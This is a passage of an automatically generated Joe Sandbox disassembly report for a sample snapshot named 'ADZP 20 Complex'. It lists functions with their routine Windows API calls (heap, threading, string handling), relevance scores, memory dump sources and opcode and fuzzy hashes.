                    • Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
                    • Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004126A4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • UnregisterWait.KERNEL32(?), ref: 004126AE
                    • CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
                    • HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                    • String ID:
                    • API String ID: 4204870694-0
                    • Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
                    • Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                    Download Yara Rule
                    APIs
                    • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                    • memmove.MSVCRT ref: 004058E1
                    • wcsncpy.MSVCRT ref: 004058F9
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memmovewcsncmpwcsncpy
                    • String ID: $0A$$0A
                    • API String ID: 1452150355-167650565
                    • Opcode ID: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
                    • Opcode Fuzzy Hash: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040552C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040553B
                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcmemset
                    • String ID: RtlGetVersion$ntdll.dll
                    • API String ID: 3137504439-1489217083
                    • Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
                    • Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A6C3 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040A72B
                    • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
                    • wcscpy.MSVCRT ref: 0040A74C
                    • memset.MSVCRT ref: 0040A77A
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapmemsetwcscpywcslen
                    • String ID: $0A
                    • API String ID: 1807340688-513306843
                    • Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
                    • Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A460 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                    • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                    • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Free$Alloc
                    • String ID: $0A
                    • API String ID: 3901518246-513306843
                    • Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
                    • Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,020A9F70), ref: 004054A5
                    • EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                    • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                    • CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3708593966-0
                    • Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
                    • Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DFC6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                    • LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                    • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
                    • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                    • String ID:
                    • API String ID: 3171405041-0
                    • Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
                    • Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040994F Relevance: 7.5, APIs: 6, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • CloseHandle.KERNEL32(020A9F70,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
                    • EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
                    • LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CloseHandle$CriticalSection$EnterLeave
                    • String ID:
                    • API String ID: 10009202-0
                    • Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
                    • Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                    • wcscmp.MSVCRT ref: 004096C2
                    • memmove.MSVCRT ref: 004096DA
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                    • String ID: \\?\
                    • API String ID: 2309408642-4282027825
                    • Opcode ID: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
                    • Opcode Fuzzy Hash: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B8B6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
                    • Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapwcsncpy
                    • String ID:
                    • API String ID: 2304708654-0
                    • Opcode ID: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
                    • Opcode Fuzzy Hash: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
                    • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CharLower
                    • String ID:
                    • API String ID: 1615517891-0
                    • Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
                    • Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412840 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
                    • malloc.MSVCRT ref: 00412884
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
                    • malloc.MSVCRT ref: 004128B6
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
                    • Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004128E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
                    • malloc.MSVCRT ref: 00412921
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
                    • malloc.MSVCRT ref: 00412950
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
                    • Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AFEC Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    • SHGetFolderLocation.SHELL32(00000000,020A9F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
                    • wcslen.MSVCRT ref: 0040B01A
                    • CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FolderFreeFromListLocationPathTaskwcslen
                    • String ID:
                    • API String ID: 4012708801-0
                    • Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
                    • Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8
                    Uniqueness

                    Uniqueness Score: -1.00%

